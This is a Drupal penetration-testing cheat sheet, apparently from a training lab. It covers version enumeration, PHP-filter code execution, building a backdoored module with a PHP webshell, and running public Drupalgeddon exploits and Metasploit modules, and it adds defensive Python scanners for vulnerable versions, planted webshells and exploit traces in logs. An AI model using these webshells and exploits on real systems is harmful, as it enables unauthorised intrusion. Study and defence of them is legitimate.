Drupal

Enumeration

Getting Version Number

$ curl -s http://drupal-acc.inlanefreight.local/CHANGELOG.txt | grep -m2 ""

Automating Using Droopescan

$ droopescan scan drupal -u http://drupal.inlanefreight.local
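The version string returned by the CHANGELOG check, or the one droopescan reports, can be triaged at once against the Drupalgeddon advisories listed further down this page so that a finding is prioritised by patch status rather than by hand. The script below is an added example, not part of the original notes and not Drupal code. It assumes a Drupal 7 style CHANGELOG.txt header ("Drupal 7.30, 2014-07-24" is a constructed sample) or a bare x.y[.z] version, and uses the affected ranges given on this page for CVE-2014-3704 and CVE-2018-7600; the fix versions 7.59 / 8.5.3 used for CVE-2018-7602 come from the Drupal advisory SA-CORE-2018-004, not from this page.

```python
"""Triage a disclosed Drupal version against the Drupalgeddon advisories.

Added example for this page (not from the original notes, not Drupal code).
Affected ranges for CVE-2014-3704 and CVE-2018-7600 are the ones stated on
the page; the 7.59 / 8.5.3 fix versions for CVE-2018-7602 are taken from
Drupal advisory SA-CORE-2018-004 (assumption: those advisory numbers apply).
"""
import re

# Drupal 7 CHANGELOG.txt starts with a line such as "Drupal 7.30, 2014-07-24".
# Drupal 8+ no longer ships a version line there, so droopescan output is the
# usual source of the bare version string handled by the fallback pattern.
VERSION_RE = re.compile(r"\bDrupal\s+(\d+)\.(\d+)(?:\.(\d+))?", re.IGNORECASE)
BARE_RE = re.compile(r"\s*(\d+)\.(\d+)(?:\.(\d+))?")


def parse_version(text):
    """Return (major, minor, patch) from CHANGELOG text or a bare version; None if absent."""
    m = VERSION_RE.search(text) or BARE_RE.match(text)
    if not m:
        return None
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


# (CVE, predicate on the version tuple, note). Order is oldest advisory first.
ADVISORIES = [
    ("CVE-2014-3704",
     lambda v: (7, 0, 0) <= v <= (7, 31, 0),
     "unauthenticated SQL injection; fixed in 7.32"),
    ("CVE-2018-7600",
     lambda v: (v[0] == 7 and v < (7, 58, 0)) or (v[0] == 8 and v < (8, 5, 1)),
     "unauthenticated RCE; fixed in 7.58 / 8.5.1"),
    ("CVE-2018-7602",
     lambda v: (v[0] == 7 and v < (7, 59, 0)) or (v[0] == 8 and v < (8, 5, 3)),
     "authenticated RCE; fixed in 7.59 / 8.5.3 (SA-CORE-2018-004)"),
]


def applicable_cves(version):
    """List the CVE ids whose affected range contains the given version tuple."""
    return [cve for cve, hit, _note in ADVISORIES if hit(version)]


def triage(text):
    """Parse a version out of text and report which listed CVEs still apply."""
    v = parse_version(text)
    if v is None:
        return {"version": None, "cves": [],
                "note": "version not disclosed; fall back to droopescan or manual review"}
    return {"version": ".".join(map(str, v)), "cves": applicable_cves(v)}


# Constructed sample of what the CHANGELOG.txt check returns on a Drupal 7 site.
SAMPLE_CHANGELOG = "Drupal 7.30, 2014-07-24\n-----------------------\n"

if __name__ == "__main__":
    print(triage(SAMPLE_CHANGELOG))   # three CVEs apply to 7.30
    print(triage("8.5.0"))            # droopescan-style bare version
    print(triage("Drupal 8.x"))       # no parsable version
```

Unpatched minor releases are compared as plain tuples, so a site reporting 8.5.1 is flagged for CVE-2018-7602 only, while 8.5.3 and 7.59 clear all three.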

Exploitation

Code Execution

  • Before Drupal 8

    • Log in as admin

    • Enable the PHP filter module -> Save

    • Content -> Add content -> Basic Page (set Text Format to PHP Code) and add:

    <?php system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']); ?>

  • Drupal 8 onwards

    • Log in as admin

    • $ wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz

    • Administration -> Reports -> Available Updates

    • Upload the downloaded PHP filter module

    • Adding a PHP-format page then works exactly as in versions before 8.0

Uploading a Backdoored Module

  1. Download and extract a module

$ wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
$ tar xvf captcha-8.x-1.2.tar.gz

  2. Create a PHP webshell (shell.php; the parameter name must be quoted, an unquoted key is a fatal error on PHP 8)

<?php
system($_GET['fe8edbabc5c5c9b7b764504cd22b17af']);
?>

  3. Create an .htaccess file

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>

  4. Move both files into the extracted folder and pack it again as a gzipped tar (or zip)

$ mv shell.php .htaccess captcha
$ tar czvf captcha.tar.gz captcha/

  5. Install the backdoored module (Manage -> Extend -> Install new module)

  6. Browse to /modules/captcha/shell.php to execute commands.
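A module installed this way leaves two artefacts that a legitimate contrib module does not carry: a PHP file that hands request input straight to a command or eval primitive, and an .htaccess inside the module folder. The scanner below is an added example (not part of the original notes and not Drupal code) that walks a modules tree and reports both; the sample tree it builds in a temporary directory is constructed, with a clean captcha.module beside a planted shell.php and .htaccess, and the indicator patterns are assumptions drawn from the technique described above.

```python
"""Scan a Drupal modules directory for planted webshell artefacts.

Added example for this page (not from the original notes, not Drupal code).
It flags PHP-type files that feed a request superglobal into a command or
eval primitive, and .htaccess files that switch on mod_rewrite inside a
module folder. The fixture tree is constructed for the demonstration.
"""
import os
import re
import tempfile

# Command/eval primitives called directly on request input (assumed indicator set).
WEBSHELL_RE = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(\s*"
    r"(?:base64_decode\s*\(\s*)?\$_(GET|POST|REQUEST|COOKIE)\b",
    re.IGNORECASE,
)
# A module shipped by drupal.org has no reason to enable the rewrite engine itself.
HTACCESS_RE = re.compile(r"RewriteEngine\s+On", re.IGNORECASE)
PHP_SUFFIXES = (".php", ".inc", ".module", ".phtml", ".install", ".theme")


def scan_modules(root):
    """Return a sorted list of (relative_path, reason) findings under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            if name == ".htaccess" and HTACCESS_RE.search(data):
                findings.append((rel, "htaccess-rewrite-in-module"))
            elif name.lower().endswith(PHP_SUFFIXES):
                m = WEBSHELL_RE.search(data)
                if m:
                    findings.append((rel, "request-to-" + m.group(1).lower()))
    return sorted(findings)


def build_fixture():
    """Constructed sample tree: one clean module file plus the two planted artefacts."""
    root = tempfile.mkdtemp(prefix="drupal-modules-")
    captcha = os.path.join(root, "captcha")
    os.makedirs(os.path.join(captcha, "src"))
    with open(os.path.join(captcha, "captcha.module"), "w") as fh:
        fh.write("<?php\nfunction captcha_help($route) { return t('CAPTCHA'); }\n")
    with open(os.path.join(captcha, "shell.php"), "w") as fh:
        fh.write("<?php\nsystem($_GET['cmd']);\n?>\n")
    with open(os.path.join(captcha, ".htaccess"), "w") as fh:
        fh.write("<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteBase /\n</IfModule>\n")
    return root


if __name__ == "__main__":
    for rel, reason in scan_modules(build_fixture()):
        print(f"{reason:32} {rel}")
```

Pointing scan_modules at a real /modules or /modules/contrib tree gives a quick first pass; confirming that a flagged file is not part of the packaged release from drupal.org (a diff against a fresh download of the same version) settles the remaining cases.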

Drupalgeddon

  • CVE-2014-3704 (7.0 <= 7.31) - Unauthenticated (pre-auth) SQL injection flaw that could be used to upload a malicious form or create a new admin user.

    • $ wget https://www.exploit-db.com/raw/34992
      $ python2.7 34992 -t http://drupal-qa.inlanefreight.local -u hacker -p pwnd
    • $ msfconsole
      msf6 > use exploit/multi/http/drupal_drupageddon
  • CVE-2018-7600 (7.x before 7.58, 8.x before 8.5.1) - Unauthenticated remote code execution vulnerability (Drupalgeddon 2)

    • $ wget https://www.exploit-db.com/raw/44448 -O drupalgeddon2.py
      $ python3 drupalgeddon2.py
      
      Enter target url (example: https://domain.ltd/): http://drupal-dev.inlanefreight.local/
      
      Check: http://drupal-dev.inlanefreight.local/hello.txt
  • CVE-2018-7602 (7.x, 8.x) - Authenticated remote code execution vulnerability (Drupalgeddon 3)

    • msf6 > use exploit/multi/http/drupal_drupageddon3
      msf6 exploit(multi/http/drupal_drupageddon3) > set RHOSTS 10.129.42.195
      msf6 exploit(multi/http/drupal_drupageddon3) > set VHOST drupal-acc.inlanefreight.local
      msf6 exploit(multi/http/drupal_drupageddon3) > set drupal_session SESS45ecfcb93a827c3e578eae161f280548=jaAPbanr2KhLkLJwo69t0UOkn2505tXCaEdu33ULV2Y
      msf6 exploit(multi/http/drupal_drupageddon3) > set DRUPAL_NODE 1
      msf6 exploit(multi/http/drupal_drupageddon3) > set LHOST 10.10.14.15
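Both Drupalgeddon 2 exploit paths, and the authenticated CVE-2018-7602 variant, work by pushing Form API render-array keys (which begin with '#') through request parameters, so they leave a recognisable trace in an ordinary access log: a '#' (or its encoding %23, double-encoded as %2523 in the authenticated variant) inside a bracketed parameter name or inside the element_parents value of the AJAX form endpoint. The detector below is an added example, not part of the original notes and not code from any Drupal project or exploit; the combined-format log lines in SAMPLE_LOG are constructed, with placeholder addresses from the documentation ranges and FUNCTION / PLACEHOLDER standing in for the injected values.

```python
"""Flag Drupalgeddon-style requests in a combined-format access log.

Added example for this page (not from the original notes, not Drupal or
exploit code). Indicator: a Form API render-array key ('#post_render' and
friends) appearing in a bracketed request parameter, or a '#' inside the
element_parents value of the AJAX form endpoint. The sample log lines are
constructed; hosts and IPs are placeholders.
"""
import re
from urllib.parse import unquote

# Combined log format: client ident user [timestamp] "METHOD PATH PROTO" status size
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Render-array keys the public exploits inject (callback slots and markup).
RENDER_KEYS = ("post_render", "pre_render", "lazy_builder",
               "access_callback", "markup", "type", "value")
KEY_RE = re.compile(r"\[#(" + "|".join(RENDER_KEYS) + r")\]", re.IGNORECASE)
# Drupal 8 AJAX endpoint abuse: a '#' inside the element_parents value.
PARENTS_RE = re.compile(r"(?:^|[?&])element_parents=[^&]*#", re.IGNORECASE)


def classify(path):
    """Return a reason string if the request path looks like a Drupalgeddon probe, else None."""
    decoded = unquote(unquote(path))  # strip one or two layers of URL encoding
    m = KEY_RE.search(decoded)
    if m:
        return "render-key-in-param:" + m.group(1).lower()
    if PARENTS_RE.search(decoded):
        return "hash-in-element_parents"
    return None


def scan_log(lines):
    """Parse access-log lines and return one finding dict per suspicious request."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in combined log format: skip
        reason = classify(m.group("path"))
        if reason:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "method": m.group("method"),
                "path": m.group("path"),
                "status": int(m.group("status")),
                "reason": reason,
            })
    return findings


# Constructed sample log; 198.51.100.5 is benign traffic, 203.0.113.7 the probes.
SAMPLE_LOG = [
    '198.51.100.5 - - [10/Oct/2023:13:55:01 +0000] "GET /node/1 HTTP/1.1" 200 4021',
    # Drupal 7 style probe: render keys injected through the password-reset form
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /?q=user/password&name[%23post_render][]=FUNCTION&name[%23type]=markup&name[%23markup]=PLACEHOLDER HTTP/1.1" 200 512',
    '198.51.100.5 - - [10/Oct/2023:13:56:02 +0000] "GET /search/node?keys[]=drupal&keys[]=security HTTP/1.1" 200 8803',
    # Drupal 8 style probe: '#' inside element_parents on the AJAX form endpoint
    '203.0.113.7 - - [10/Oct/2023:13:57:10 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 1532',
    # Double-encoded key (%2523) as seen with the authenticated variant
    '203.0.113.7 - - [10/Oct/2023:14:01:44 +0000] "GET /?q=node/1/delete&destination=node?q[%2523post_render][]=FUNCTION HTTP/1.1" 200 903',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']:15} {f['reason']:32} {f['method']} {f['path']}")
```

Only the query string is visible in an access log, so a POST body carrying the keys (the Drupal 8 path sends them there) is caught through its element_parents marker rather than the body itself; a web application firewall or request-body logging is needed to see the rest, and a 200 on one of these requests is the cue to check the webroot for dropped files such as the hello.txt the public PoC writes.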
